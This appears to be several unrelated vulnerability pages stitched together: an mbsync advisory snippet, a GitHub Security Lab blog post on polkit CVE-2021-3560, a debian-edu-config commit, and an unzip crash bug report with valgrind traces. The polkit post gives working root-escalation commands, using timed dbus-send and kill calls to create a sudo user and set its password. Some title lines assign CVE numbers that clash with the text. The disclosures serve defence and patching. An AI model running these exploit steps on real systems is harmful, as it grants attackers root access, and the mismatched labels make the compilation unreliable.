A flaw was found in mbsync before v1.3.6 and v1.4.2, where an unchecked pointer cast allows a malicious or compromised server to write an arbitrary integer value past the end of a heap-allocated structure by issuing an unexpected APPENDUID response. This could be plausibly exploited for remote code execution on the client.

polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit. As a member of GitHub Security Lab, my job is to help improve the security of open source software by finding and reporting vulnerabilities. A few weeks ago, I found a privilege escalation vulnerability in polkit. I coordinated the disclosure of the vulnerability with the polkit maintainers and with Red Hat’s security team. It was publicly disclosed, the fix was released on June 3, 2021, and it was assigned CVE-2021-3560.

The vulnerability enables an unprivileged local user to get a root shell on the system. It’s easy to exploit with a few standard command line tools, as you can see in this short video. In this blog post, I’ll explain how the exploit works and show you where the bug was in the source code.

**Table of contents**

*   History of CVE-2021-3560 and vulnerable distributions
*   About polkit
*   Exploitation steps
*   polkit architecture
*   The vulnerability
*   org.freedesktop.policykit.imply annotations
*   Conclusion

**History of CVE-2021-3560 and vulnerable distributions**

The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently.

The bug has a slightly different history on Debian and its derivatives (such as Ubuntu), because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable. However, some Debian derivatives, such as Ubuntu, are based on Debian unstable, which is vulnerable.

Here’s a table with a selection of popular distributions and whether they’re vulnerable (note that this isn’t a comprehensive list):

Distribution

Vulnerable?

RHEL 7

No

RHEL 8

Yes

Fedora 20 (or earlier)

No

Fedora 21 (or later)

Yes

Debian 10 (“buster”)

No

Debian testing (“bullseye”)

Yes

Ubuntu 18.04

No

Ubuntu 20.04

Yes

**About polkit**

polkit is the system service that’s running under the hood when you see a dialog box like the one below:

It essentially plays the role of a judge. If you want to do something that requires higher privileges—for example, creating a new user account—then it’s polkit’s job to decide whether or not you’re allowed to do it. For some requests, polkit will make an instant decision to allow or deny, and for others it will pop up a dialog box so that an administrator can grant authorization by entering their password.

The dialog box might give the impression that polkit is a graphical system, but it’s actually a background process. The dialog box is known as an _authentication agent_ and it’s really just a mechanism for sending your password to polkit. To illustrate that polkit isn’t just for graphical sessions, try running this command in a terminal:

pkexec reboot

pkexec is a similar command to sudo, which enables you to run a command as root. If you run pkexec in a graphical session, it will pop up a dialog box, but if you run it in a text-mode session such as SSH then it starts its own text-mode authentication agent:

$ pkexec reboot
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run \`/usr/sbin/reboot' as the super user
Authenticating as: Kevin Backhouse,,, (kev)
Password:

Another command that you can use to trigger polkit from the command line is dbus-send. It’s a general purpose tool for sending D-Bus messages that’s mainly used for testing, but it’s usually installed by default on systems that use D-Bus. It can be used to simulate the D-Bus messages that the graphical interface might send. For example, this is the command to create a new user:

dbus-send --system --dest=org.freedesktop.Accounts --type=method\_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1

If you run that command in a graphical session, an authentication dialog box will pop up, but if you run it in a text-mode session such as SSH, then it fails immediately. That’s because, unlike pkexec, dbus-send does not start its own authentication agent.

**Exploitation steps**

The vulnerability is surprisingly easy to exploit. All it takes is a few commands in the terminal using only standard tools like bash, kill, and dbus-send.

The proof of concept (PoC) exploit I describe in this section depends on two packages being installed: accountsservice and gnome-control-center. On a graphical system such as Ubuntu Desktop, both of those packages are usually installed by default. But if you’re using something like a non-graphical RHEL server, then you might need to install them, like this:

sudo yum install accountsservice gnome-control-center

Of course, the vulnerability doesn’t have anything specifically to do with either accountsservice or gnome-control-center. They’re just polkit clients that happen to be convenient vectors for exploitation. The reason why the PoC depends on gnome-control-center and not just accountsservice is subtle—I’ll explain that later.

To avoid repeatedly triggering the authentication dialog box (which can be annoying), I recommend running the commands from an SSH session:

ssh localhost

The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request. I like to think that it’s theoretically possible to trigger by smashing Ctrl+C at just the right moment, but I’ve never succeeded, so I do it with a small amount of bash scripting instead. First, you need to measure how long it takes to run the dbus-send command normally:

time dbus-send --system --dest=org.freedesktop.Accounts --type=method\_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1

The output will look something like this:

Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required

real 0m0.016s
user 0m0.005s
sys 0m0.000s

That took 16 milliseconds for me, so that means that I need to kill the dbus-send command after approximately 8 milliseconds:

dbus-send --system --dest=org.freedesktop.Accounts --type=method\_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!

You might need to run that a few times, and you might need to experiment with the number of milliseconds in the delay. When the exploit succeeds, you’ll see that a new user named boris has been created:

$ id boris
uid=1002(boris) gid=1002(boris) groups=1002(boris),27(sudo)

Notice that boris is a member of the sudo group, so you’re already well on your way to full privilege escalation. Next, you need to set a password for the new account. The D-Bus interface expects a hashed password, which you can create using openssl:

$ openssl passwd -5 iaminvincible!
$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB

Now you just have to do the same trick again, except this time call the SetPassword D-Bus method:

dbus-send --system --dest=org.freedesktop.Accounts --type=method\_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB' string:GoldenEye & sleep 0.008s ; kill $!

Again, you might need to experiment with the length of the delay and run it several times until it succeeds. Also, note that you need to paste in the correct user identifier (UID), which is “1002” in this example, plus the password hash from the openssl command.

Now you can login as boris and become root:

su - boris # password: iaminvincible!
sudo su # password: iaminvincible!

**polkit architecture**

To help explain the vulnerability, here’s a diagram of the five main processes involved during the dbus-send command:

The two processes above the dashed line—dbus-send and the authentication agent—are unprivileged user processes. Those below the line are privileged system processes. In the center is dbus-daemon, which handles all of the communication: the other four processes communicate with each other by sending D-Bus messages.

dbus-daemon plays a very important role in the security of polkit, because it enables the four processes to communicate securely and check each other’s credentials. For example, when the authentication agent sends an authentication cookie to polkit, it does so by sending it to the org.freedesktop.PolicyKit1 D-Bus address. Since that address is only allowed to be registered by a root process, there is no risk of an unprivileged process intercepting messages. dbus-daemon also assigns every connection a “unique bus name:” typically something like “:1.96”. It’s a bit like a process identifier (PID), except without being vulnerable to PID recycling attacks. Unique bus names are currently chosen from a 64-bit range, so there’s no risk of a vulnerability caused by a name being reused.

This is the sequence of events:

1.  dbus-send asks accounts-daemon to create a new user.
2.  accounts-daemon receives the D-Bus message from dbus-send. The message includes the unique bus name of the sender. Let’s assume it’s “:1.96”. This name is attached to the message by dbus-daemon and cannot be forged.
3.  accounts-daemon asks polkit if connection :1.96 is authorized to create a new user.
4.  polkit asks dbus-daemon for the UID of connection :1.96.
5.  If the UID of connection :1.96 is “0,” then polkit immediately authorizes the request. Otherwise, it sends the authentication agent a list of administrator users who are allowed to authorize the request.
6.  The authentication agent opens a dialog box to get the password from the user.
7.  The authentication agent sends the password to polkit.
8.  polkit sends a “yes” reply back to accounts-daemon.
9.  accounts-daemon creates the new user account.

**The vulnerability**

Why does killing the dbus-send command cause an authentication bypass? The vulnerability is in step four of the sequence of events listed above. What happens if polkit asks dbus-daemon for the UID of connection :1.96, but connection :1.96 no longer exists? dbus-daemon handles that situation correctly and returns an error. But it turns out that polkit does not handle that error correctly. In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0. In other words, it immediately authorizes the request because it thinks the request has come from a root process.

Why is the timing of the vulnerability non-deterministic? It turns out that polkit asks dbus-daemon for the UID of the requesting process multiple times, on different codepaths. Most of those codepaths handle the error correctly, but one of them doesn’t. If you kill the dbus-send command early, it’s handled by one of the correct codepaths and the request is rejected. To trigger the vulnerable codepath, you have to disconnect at just the right moment. And because there are multiple processes involved, the timing of that “right moment” varies from one run to the next. That’s why it usually takes a few tries for the exploit to succeed. I’d guess it’s also the reason why the bug wasn’t previously discovered. If you could trigger the vulnerability by killing the dbus-send command immediately, then I expect it would have been discovered a long time ago, because that’s a much more obvious thing to test for.

The function which asks dbus-daemon for the UID of the requesting connection is named polkit_system_bus_name_get_creds_sync:

static gboolean
polkit\_system\_bus\_name\_get\_creds\_sync (
PolkitSystemBusName           \*system\_bus\_name,
    guint32                       \*out\_uid,
    guint32                       \*out\_pid,
    GCancellable                  \*cancellable,
    GError                       \*\*error)

The behavior of polkit_system_bus_name_get_creds_sync is strange, because when an error occurs, the function sets the error parameter but still returns TRUE. It wasn’t clear to me, when I wrote my bug report, whether that was a bug or a deliberate design choice. (It turns out that it was a bug, because the polkit developers have fixed the vulnerability by returning FALSE on error.) My uncertainty arose from the fact that _almost all_ the callers of polkit_system_bus_name_get_creds_sync don’t just check the Boolean result, but also check that the error value is still NULL before proceeding. The cause of the vulnerability was that the error value wasn’t checked in the following stack trace:

0 in polkit\_system\_bus\_name\_get\_creds\_sync of polkitsystembusname.c:388
1 in polkit\_system\_bus\_name\_get\_user\_sync of polkitsystembusname.c:511
2 in polkit\_backend\_session\_monitor\_get\_user\_for\_subject of polkitbackendsessionmonitor-systemd.c:303
3 in check\_authorization\_sync of polkitbackendinteractiveauthority.c:1121
4 in check\_authorization\_sync of polkitbackendinteractiveauthority.c:1227
5 in polkit\_backend\_interactive\_authority\_check\_authorization of polkitbackendinteractiveauthority.c:981
6 in polkit\_backend\_authority\_check\_authorization of polkitbackendauthority.c:227
7 in server\_handle\_check\_authorization of polkitbackendauthority.c:790
7 in server\_handle\_method\_call of polkitbackendauthority.c:1272

The bug is in this snippet of code in check_authorization_sync:

/\* every subject has a user; this is supplied by the client, so we rely
 \* on the caller to validate its acceptability. \*/
user\_of\_subject = polkit\_backend\_session\_monitor\_get\_user\_for\_subject (priv->session\_monitor,
                                                                       subject, NULL,
                                                                       error);
if (user\_of\_subject == NULL)
    goto out;

/\* special case: uid 0, root, is \_always\_ authorized for anything \*/
if (POLKIT\_IS\_UNIX\_USER (user\_of\_subject) && polkit\_unix\_user\_get\_uid (POLKIT\_UNIX\_USER (user\_of\_subject)) == 0)
  {
    result = polkit\_authorization\_result\_new (TRUE, FALSE, NULL);
    goto out;
  }

Notice that the value of error is not checked.

**org.freedesktop.policykit.imply annotations**

I mentioned earlier that my PoC depends on gnome-control-center being installed, in addition to accountsservice. Why is that? The PoC doesn’t use gnome-control-center in any visible way, and I didn’t even realize that I was depending on it when I wrote the PoC! In fact, I only found out because the Red Hat security team couldn’t reproduce my PoC on RHEL. When I tried it for myself on a RHEL 8.4 VM, I also found that the PoC didn’t work. That was puzzling, because it was working beautifully on Fedora 32 and CentOS Stream. The crucial difference, it turned out, was that my RHEL VM was a non-graphical server with no GNOME installed. So why does that matter? The answer is policykit.imply annotations.

Some polkit actions are essentially equivalent to each other, so if one has already been authorized then it makes sense to silently authorize the other. The GNOME settings dialog is a good example:

After you’ve clicked the “Unlock” button and entered your password, you can do things like adding a new user account without having to authenticate a second time. That’s handled by a policykit.imply annotation, which is defined in this config file:

/usr/share/polkit-1/actions/org.gnome.controlcenter.user-accounts.policy

The config file contains the following implication:

In other words, if you’re authorized to perform controlcenter admin actions, then you’re also authorized to perform accountsservice admin actions.

When I attached GDB to polkit on my RHEL VM, I found that I wasn’t seeing the vulnerable stack trace that I listed earlier. Notice that step four of the stack trace is a recursive call from check_authorization_sync to itself. That happens on line 1227, which is where polkit checks the policykit.imply annotations:

PolkitAuthorizationResult \*implied\_result = NULL;
PolkitImplicitAuthorization implied\_implicit\_authorization;
GError \*implied\_error = NULL;
const gchar \*imply\_action\_id;

imply\_action\_id = polkit\_action\_description\_get\_action\_id (imply\_ad);

/\* g\_debug ("%s is implied by %s, checking", action\_id, imply\_action\_id); \*/
implied\_result = check\_authorization\_sync (authority, caller, subject,
                                           imply\_action\_id,
                                           details, flags,
                                           &implied\_implicit\_authorization, TRUE,
                                           &implied\_error);
if (implied\_result != NULL)
  {
    if (polkit\_authorization\_result\_get\_is\_authorized (implied\_result))
      {
        g\_debug (" is authorized (implied by %s)", imply\_action\_id);
        result = implied\_result;
        /\* cleanup \*/
        g\_strfreev (tokens);
        goto out;
      }
    g\_object\_unref (implied\_result);
  }
if (implied\_error != NULL)
  g\_error\_free (implied\_error);

The authentication bypass depends on the error value getting ignored. It was ignored on line 1121, but it’s still stored in the error parameter, so it also needs to be ignored by the caller. The block of code above has a temporary variable named implied_error, which is ignored when implied_result isn’t null. That’s the crucial step that makes the bypass possible.

To sum up, the authentication bypass only works on polkit actions that are implied by another polkit action. That’s why my PoC only works if gnome-control-center is installed: it adds the policykit.imply annotation that enables me to target accountsservice. That does not mean that RHEL is safe from this vulnerability, though. Another attack vector for the vulnerability is packagekit, which is installed by default on RHEL and has a suitable policykit.imply annotation for the package-install action. packagekit is used to install packages, so it can be exploited to install gnome-control-center, after which the rest of the exploit works as before.

**Conclusion**

CVE-2021-3560 enables an unprivileged local attacker to gain root privileges. It’s very simple and quick to exploit, so it’s important that you update your Linux installations as soon as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

And if you like nerding out about security vulnerabilities (and how to fix them) check out some of the other work that the Security Lab team is doing or follow us on Twitter.

**Explore more from GitHub**

**Security**

Secure platform, secure data. Everything you need to make security your #1.

Learn more

**The ReadME Project**

Stories and voices from the developer community.

Learn more

**GitHub Actions**

Native CI/CD alongside code hosted in GitHub.

Learn more

**Work at GitHub!**

Check out our current job openings.

Learn more

CVE-2021-3578: Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug | The GitHub Blog

It was discovered, that debian-edu-config, a set of configuration files used for the Debian Edu blend, before 2.12.16 configured insecure permissions for the user web shares (~/public_html), which could result in privilege escalation.

**Commit 4d39a588** authored Jan 15, 2022 by ![Mike Gabriel's avatar](https://seccdn.libravatar.org/avatar/afdb27a58e8139f2f6d02ad5c7d085fa?s=48&d=identicon&gravatarproxy=n "Mike Gabriel")

Browse files

**etc/apache2/mods-available/debian-edu-userdir.conf: Disable built-in PHP engine.**

*   Changes 1

...

...

@@ -3,6 +3,9 @@

UserDir disabled root

<Directory /skole/\*/home\*/\*/public\_html\>

php\_admin\_flag engine off

AllowOverride FileInfo AuthConfig Limit

Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec

<Limit GET POST OPTIONS\>

...

...

*   mentioned in commit 1c06c8a0
    
    mentioned in commit 1c06c8a008ed2853e703a17ad02d31fdb7c0e422
    
*   mentioned in commit f400eb04
    
    mentioned in commit f400eb04488662059ba961d07cc94489c96601eb
    
*   mentioned in commit ac1d297b
    
    mentioned in commit ac1d297bf93bc57fc9eb8fc32ac89394d316c6a7
    
*   ![](https://salsa.debian.org/uploads/-/system/user/avatar/1613/avatar.png)
    
    MITRE publishing request: https://github.com/CVEProject/cvelist/pull/4506

CVE-2021-20001: etc/apache2/mods-available/debian-edu-userdir.conf: Disable built-in PHP engine. (4d39a588) · Commits · Debian Edu / debian-edu-config

A flaw was found in unzip 6.0. The vulnerability occurs during the conversion of an utf-8 string to a local string that leads to a segmentation fault. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.

Comment 1 Sandipan Roy 2022-02-07 08:00:26 UTC

Created unzip tracking bugs for this issue:

Affects: fedora-all \[bug 2051397\]

Comment 6 Salvatore Bonaccorso 2022-02-12 10:10:22 UTC

Hi,

The referenced bug is not accessible, can you share details on this CVE?

Regards,
Salvatore

Comment 7 Sandipan Roy 2022-02-14 09:54:43 UTC

Hey Nils,

Can you add your flaw and POC files to this bug as public?

Thanks.

Comment 8 Nils Bars 2022-02-14 09:59:12 UTC

Created attachment 1860944 \[details\]
Reproduction scripts and bug triggering input.

SIGSEGV during the conversion of an utf-8 string to a local string

# Description
During extraction of the attached zip archive via
\`\`\`
unzip $PWD/testcase
\`\`\`
a nullpointer dereference is triggered and causes a segmentation fault (SIGSEGV).
The bug appears to be located in the code responsible for handling the conversion
of an utf-8 string to a local string.
A possible fix would be to check in the function \`utf8\_to\_local\_string\` whether the
call to \`utf8\_to\_wide\_string\` returns NULL and to handle the situation accordingly.

This bug allows an attacker to perform a denial of service and possibly opens up
other attack vectors.

To reproduce the crash, we provide scripts alongside the crashing input:
- ./reproduce-fedora.sh: Reproduce crash via a Fedora 35 docker container
- ./reproduce-ubuntu.sh: Reproduce crash via a Ubuntu 20.04 docker container

If you need further details, we are happy to assist where possible.

# yum info unzip
Last metadata expiration check: 0:04:07 ago on Mon Jan 31 12:39:57 2022.
Installed Packages
Name         : unzip
Version      : 6.0
Release      : 53.fc35
Architecture : x86\_64
Size         : 385 k
Source       : unzip-6.0-53.fc35.src.rpm
Repository   : @System
From repo    : fedora
Summary      : A utility for unpacking zip files
URL          : http://www.info-zip.org/UnZip.html
License      : BSD
Description  : The unzip utility is used to list, test, or extract files from a zip
             : archive.  Zip archives are commonly found on MS-DOS systems.  The zip
             : utility, included in the zip package, creates zip archives.  Zip and
             : unzip are both compatible with archives created by PKWARE(R)'s PKZIP
             : for MS-DOS, but the programs' options and default behaviors do differ
             : in some respects.
             : 
             : Install the unzip package if you need to list, test or extract files from
             : a zip archive.

# valgrind fedora
\[+\] Running unzip /testcase
==1== Memcheck, a memory error detector
==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==1== Command: unzip /testcase
==1== 
Archive:  /testcase
warning \[/testcase\]:  16 extra bytes at beginning or within zipfile
  (attempting to process anyway)
error \[/testcase\]:  reported length of central directory is
  -16 bytes too long (Atari STZip zipfile?  J.H.Holm ZIPSPLIT 1.1
  zipfile?).  Compensating...
==1== Invalid read of size 8
==1==    at 0x10CB55: UnknownInlinedFun (process.c:2503)
==1==    by 0x10CB55: UnknownInlinedFun (process.c:2600)
==1==    by 0x10CB55: do\_string.part.0.cold (fileio.c:2361)
==1==    by 0x118650: UnknownInlinedFun (fileio.c:2041)
==1==    by 0x118650: extract\_or\_test\_entrylist (extract.c:1377)
==1==    by 0x11A1F1: extract\_or\_test\_files (extract.c:742)
==1==    by 0x1253D6: do\_seekable.lto\_priv.0 (process.c:994)
==1==    by 0x10E51E: UnknownInlinedFun (process.c:401)
==1==    by 0x10E51E: UnknownInlinedFun (unzip.c:1279)
==1==    by 0x10E51E: main (unzip.c:742)
==1==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==1== 
error:  zipfile probably corrupt (segmentation violation)
==1== 
==1== HEAP SUMMARY:
==1==     in use at exit: 80,290 bytes in 8 blocks
==1==   total heap usage: 22 allocs, 14 frees, 86,257 bytes allocated
==1== 
==1== LEAK SUMMARY:
==1==    definitely lost: 0 bytes in 0 blocks
==1==    indirectly lost: 0 bytes in 0 blocks
==1==      possibly lost: 0 bytes in 0 blocks
==1==    still reachable: 80,290 bytes in 8 blocks
==1==         suppressed: 0 bytes in 0 blocks
==1== Rerun with --leak-check=full to see details of leaked memory
==1== 
==1== For lists of detected and suppressed errors, rerun with: -s
==1== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
\[+\] Dropping into shell. Malformed input is located at /testcase


# apt-show unzip
Package: unzip
Version: 6.0-25ubuntu1
Priority: optional
Section: utils
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com\>
Original-Maintainer: Santiago Vila <sanvila@debian.org\>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Installed-Size: 593 kB
Depends: libbz2-1.0, libc6 (>= 2.14)
Suggests: zip
Homepage: http://www.info-zip.org/UnZip.html
Task: ubuntu-desktop-minimal, ubuntu-desktop, kubuntu-desktop, xubuntu-core, xubuntu-desktop, lubuntu-desktop, ubuntustudio-desktop-core, ubuntustudio-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop, ubuntu-budgie-desktop
Download-Size: 169 kB
APT-Manual-Installed: yes
APT-Sources: http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
Description: De-archiver for .zip files

# valgrind ubuntu
==1== Memcheck, a memory error detector
==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1== Command: unzip /testcase
==1== 
Archive:  /testcase
warning \[/testcase\]:  16 extra bytes at beginning or within zipfile
  (attempting to process anyway)
error \[/testcase\]:  reported length of central directory is
  -16 bytes too long (Atari STZip zipfile?  J.H.Holm ZIPSPLIT 1.1
  zipfile?).  Compensating...
==1== Invalid read of size 8
==1==    at 0x11E5CD: wide\_to\_local\_string (process.c:2511)
==1==    by 0x11E800: utf8\_to\_local\_string (process.c:2608)
==1==    by 0x117D50: do\_string (fileio.c:2362)
==1==    by 0x111EE8: extract\_or\_test\_entrylist (extract.c:1376)
==1==    by 0x114E16: extract\_or\_test\_files (extract.c:741)
==1==    by 0x11C830: do\_seekable (process.c:994)
==1==    by 0x11D796: process\_zipfiles (process.c:401)
==1==    by 0x10EB36: unzip (unzip.c:1278)
==1==    by 0x48890B2: (below main) (libc-start.c:308)
==1==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==1== 
error:  zipfile probably corrupt (segmentation violation)
==1== 
==1== HEAP SUMMARY:
==1==     in use at exit: 80,290 bytes in 8 blocks
==1==   total heap usage: 22 allocs, 14 frees, 86,257 bytes allocated
==1== 
==1== LEAK SUMMARY:
==1==    definitely lost: 0 bytes in 0 blocks
==1==    indirectly lost: 0 bytes in 0 blocks
==1==      possibly lost: 0 bytes in 0 blocks
==1==    still reachable: 80,290 bytes in 8 blocks
==1==         suppressed: 0 bytes in 0 blocks
==1== Rerun with --leak-check=full to see details of leaked memory
==1== 
==1== For lists of detected and suppressed errors, rerun with: -s
==1== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
\[+\] Dropping into shell. Malformed input is located at /testcase

CVE-2022-0530: SIGSEGV during the conversion of an utf-8 string to a local string

A flaw was found in unzip 6.0. The vulnerability occurs during the conversion of wide string to local string that leads to a heap of out-of-bound writes. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.

Tag

#debian